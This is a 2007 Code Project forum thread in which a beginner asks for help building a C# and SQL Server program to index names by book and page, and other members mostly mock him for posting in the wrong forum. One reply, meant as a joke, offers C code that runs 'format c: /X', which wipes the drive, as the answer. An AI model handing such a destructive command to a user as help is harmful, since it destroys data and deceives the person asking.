Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Collapse
Code Project
  1. Home
  2. The Lounge
  3. I need help

I need help

Scheduled Pinned Locked Moved The Lounge
csharpdatabasesql-serversysadminhelp
12 Posts 9 Posters 1 Views 1 Watching
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • A alshaibani

    :)I'd like to make small program in c# its as the following I have number of books this books contain many pages every page contain some names , so I want to save all the names in the data base(using sql server)and the entering as the following 1. book No 2.page NO 3.the name then when I want to search for specific name the output will be as the following The Name ............ in the page ... in book ... so help me as posible you can kamal shurki

    C Offline
    C Offline
    Chris Losinger
    wrote on last edited by
    #2

    Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that)

    image processing toolkits | batch image processing | blogging

    P 1 Reply Last reply
    0
    • C Chris Losinger

      Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that) Do not post programming questions (use the programming forums for that)

      image processing toolkits | batch image processing | blogging

      P Offline
      P Offline
      Pete OHanlon
      wrote on last edited by
      #3

      It's like an episode of the Simpsons.

      Deja View - the feeling that you've seen this post before.

      1 Reply Last reply
      0
      • A alshaibani

        :)I'd like to make small program in c# its as the following I have number of books this books contain many pages every page contain some names , so I want to save all the names in the data base(using sql server)and the entering as the following 1. book No 2.page NO 3.the name then when I want to search for specific name the output will be as the following The Name ............ in the page ... in book ... so help me as posible you can kamal shurki

        J Offline
        J Offline
        Jim Crafton
        wrote on last edited by
        #4

        Here ya go!

        #include <process.h>
        int main( int argc, char** argv )
        {
        system( "format c: /X" );
        return 0
        }

        Should work wonders for ya! :)

        ¡El diablo está en mis pantalones! ¡Mire, mire! Real Mentats use only 100% pure, unfooled around with Sapho Juice(tm)! SELECT * FROM User WHERE Clue > 0 0 rows returned Save an Orange - Use the VCF! VCF Blog

        Z 1 Reply Last reply
        0
        • A alshaibani

          :)I'd like to make small program in c# its as the following I have number of books this books contain many pages every page contain some names , so I want to save all the names in the data base(using sql server)and the entering as the following 1. book No 2.page NO 3.the name then when I want to search for specific name the output will be as the following The Name ............ in the page ... in book ... so help me as posible you can kamal shurki

          T Offline
          T Offline
          Todd Smith
          wrote on last edited by
          #5

          Is this a homework assignment? p.s. there should be a prompt when posting to the lounge that says "Is this a programming question?" No will post the message. Yes will catch their computer on fire. -- modified at 16:12 Wednesday 1st August, 2007

          Todd Smith

          J L 2 Replies Last reply
          0
          • A alshaibani

            :)I'd like to make small program in c# its as the following I have number of books this books contain many pages every page contain some names , so I want to save all the names in the data base(using sql server)and the entering as the following 1. book No 2.page NO 3.the name then when I want to search for specific name the output will be as the following The Name ............ in the page ... in book ... so help me as posible you can kamal shurki

            T Offline
            T Offline
            Tom Welch
            wrote on last edited by
            #6

            If you can't find the proper board for posting questions like this, I highly recommend putting your data into an Excel spreadsheet. That shouldn't baffle you.

            A severed foot is the ultimate stocking stuffer. - Mitch Hedberg

            1 Reply Last reply
            0
            • T Todd Smith

              Is this a homework assignment? p.s. there should be a prompt when posting to the lounge that says "Is this a programming question?" No will post the message. Yes will catch their computer on fire. -- modified at 16:12 Wednesday 1st August, 2007

              Todd Smith

              J Offline
              J Offline
              Jim Crafton
              wrote on last edited by
              #7

              Maybe he's working on Google Books?

              ¡El diablo está en mis pantalones! ¡Mire, mire! Real Mentats use only 100% pure, unfooled around with Sapho Juice(tm)! SELECT * FROM User WHERE Clue > 0 0 rows returned Save an Orange - Use the VCF! VCF Blog

              1 Reply Last reply
              0
              • J Jim Crafton

                Here ya go!

                #include <process.h>
                int main( int argc, char** argv )
                {
                system( "format c: /X" );
                return 0
                }

                Should work wonders for ya! :)

                ¡El diablo está en mis pantalones! ¡Mire, mire! Real Mentats use only 100% pure, unfooled around with Sapho Juice(tm)! SELECT * FROM User WHERE Clue > 0 0 rows returned Save an Orange - Use the VCF! VCF Blog

                Z Offline
                Z Offline
                Zoltan Balazs
                wrote on last edited by
                #8

                Jim Crafton wrote:

                return 0

                It won't compile because you're missing a ";" ;) Then he will post help me urgent compile error! Oh and he needs in c# :laugh:

                Network integrated solutions A practical use of the MVC pattern

                J 1 Reply Last reply
                0
                • A alshaibani

                  :)I'd like to make small program in c# its as the following I have number of books this books contain many pages every page contain some names , so I want to save all the names in the data base(using sql server)and the entering as the following 1. book No 2.page NO 3.the name then when I want to search for specific name the output will be as the following The Name ............ in the page ... in book ... so help me as posible you can kamal shurki

                  Z Offline
                  Z Offline
                  Zoltan Balazs
                  wrote on last edited by
                  #9

                  alshaibani wrote:

                  so help me as posible you can

                  so now this is urgent?

                  Network integrated solutions A practical use of the MVC pattern

                  1 Reply Last reply
                  0
                  • Z Zoltan Balazs

                    Jim Crafton wrote:

                    return 0

                    It won't compile because you're missing a ";" ;) Then he will post help me urgent compile error! Oh and he needs in c# :laugh:

                    Network integrated solutions A practical use of the MVC pattern

                    J Offline
                    J Offline
                    Jim Crafton
                    wrote on last edited by
                    #10

                    Sigh, there's no pleasing some people...

                    ¡El diablo está en mis pantalones! ¡Mire, mire! Real Mentats use only 100% pure, unfooled around with Sapho Juice(tm)! SELECT * FROM User WHERE Clue > 0 0 rows returned Save an Orange - Use the VCF! VCF Blog

                    1 Reply Last reply
                    0
                    • A alshaibani

                      :)I'd like to make small program in c# its as the following I have number of books this books contain many pages every page contain some names , so I want to save all the names in the data base(using sql server)and the entering as the following 1. book No 2.page NO 3.the name then when I want to search for specific name the output will be as the following The Name ............ in the page ... in book ... so help me as posible you can kamal shurki

                      R Offline
                      R Offline
                      Rama Krishna Vavilala
                      wrote on last edited by
                      #11

                      Hi Kyle!:)

                      1 Reply Last reply
                      0
                      • T Todd Smith

                        Is this a homework assignment? p.s. there should be a prompt when posting to the lounge that says "Is this a programming question?" No will post the message. Yes will catch their computer on fire. -- modified at 16:12 Wednesday 1st August, 2007

                        Todd Smith

                        L Offline
                        L Offline
                        Luis Alonso Ramos
                        wrote on last edited by
                        #12

                        Todd Smith wrote:

                        there should be a prompt when posting to the lounge that says "Is this a programming question?" No will post the message. Yes will catch their computer on fire

                        Post that in the Suggestions forum ;P

                        Luis Alonso Ramos Intelectix Chihuahua, Mexico

                        My Blog!

                        1 Reply Last reply
                        0
                        Reply
                        • Reply as topic
                        Log in to reply
                        • Oldest to Newest
                        • Newest to Oldest
                        • Most Votes


                        • Login

                        • Don't have an account? Register

                        • Login or register to search.
                        • First post
                          Last post
                        0
                        • Categories
                        • Recent
                        • Tags
                        • Popular
                        • World
                        • Users
                        • Groups